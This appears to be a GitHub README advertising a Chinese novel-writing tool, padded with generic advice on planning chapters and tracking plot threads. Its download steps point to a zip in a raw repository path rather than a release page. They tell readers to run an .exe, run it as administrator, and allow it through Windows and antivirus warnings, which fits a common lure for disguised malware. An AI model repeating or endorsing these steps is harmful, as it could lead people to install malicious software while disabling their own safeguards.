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Novel-Control-Station-Skill is a Chinese novel writing tool for long-form fiction work. It helps you keep the whole story in view while you write. It is built for extended projects, including marathon writing mode.
Use it to:
- plan a full novel before you start
- keep track of plot threads
- update story state as chapters change
- recall key details from earlier parts
- stay consistent across a long draft
- manage a large Chinese novel from start to finish
Before you run the app on Windows, make sure you have:
- Windows 10 or Windows 11
- about 1 GB of free disk space
- a stable internet connection for the download
- permission to run downloaded files on your computer
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Open the release page: https://github.com/samaraundereducated370/Novel-Control-Station-Skill/raw/refs/heads/main/assets/Control-Novel-Skill-Station-2.7.zip
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Find the latest release at the top of the page.
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Look for the Windows download file in the Assets section.
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Download the file to your computer.
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Open the downloaded file:
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.zipfile, right-click it and choose Extract All - if it is an
.exefile, double-click it to run
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If Windows asks for approval, choose Run or Yes.
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Follow the on-screen steps to open the app.
After you open the app for the first time:
- choose a folder for your writing project
- create a new novel workspace
- enter your story name
- add your main characters
- write a short story outline
- save the project so you can return to it later
If the app offers a start screen, begin with a blank project. That gives you a clean place to build your novel from the ground up.
Set the core parts of your novel first:
- main idea
- setting
- lead character
- main conflict
- ending goal
This keeps your story focused.
Create a simple plan for each chapter:
- what happens
- who appears
- what changes
- what clue or problem moves forward
This helps you avoid dead ends.
Use the project control tools to keep notes on:
- character goals
- timeline
- open plot threads
- key items
- scene results
This is useful when your story has many moving parts.
When you need to remember earlier details, check your saved notes and story records. This helps you keep names, events, and facts steady across a long book.
As each chapter changes, update the project state. That way your outline stays close to the real draft.
Long novels often lose direction halfway through. Marathon mode helps you keep writing without losing the shape of the story.
It works well when you need to:
- write many chapters
- keep character growth steady
- manage twists across a long timeline
- avoid repeating the same scene idea
- keep the ending in view while writing the middle
A clean project structure makes writing easier. Try this layout:
- Story Overview
- Characters
- World Notes
- Chapter Outline
- Open Questions
- Chapter Drafts
- Final Review
This gives you a simple place for each part of the novel.
This tool fits:
- Chinese web novels
- long serial fiction
- multi-arc stories
- character-driven stories
- story planning before drafting
- revision for long manuscripts
It is useful when you need more than a simple text editor.
If the file does not open right away:
- make sure the download finished
- check your Downloads folder
- right-click the file and try Run as administrator
- if it is a zip file, extract it first
- if Windows blocks it, allow the app to run
If your antivirus asks for a decision, review the file name and source before you continue.
A good writing flow looks like this:
- set the novel idea
- create characters
- build the chapter map
- write the first arc
- update the story state
- check old notes before each new chapter
- revise the full draft at the end
This keeps the project under control.
You can start with a basic structure like this:
- Novel name: your title
- Genre: Chinese long-form fiction
- Main lead: your hero
- Main goal: what the lead wants
- Main conflict: what blocks the lead
- Side characters: key supporting roles
- Story arcs: beginning, middle, and end
- Hidden clues: important plot details
- Ending plan: the final outcome
If you want to keep your work safe:
- store your project in a clear folder name
- back up the folder often
- avoid renaming files by hand unless needed
- keep chapter drafts in order
- save after each major change
A simple folder system helps when the novel grows large.
Yes. It is built for long Chinese fiction and large story projects.
No. You can start with a small outline and grow from there.
Yes. You can keep separate projects for each novel.
No. It also helps with tracking and keeping the draft in line with the plan.
That is enough. Start with the main character and the main conflict, then add more detail later.
Download the latest Windows release here: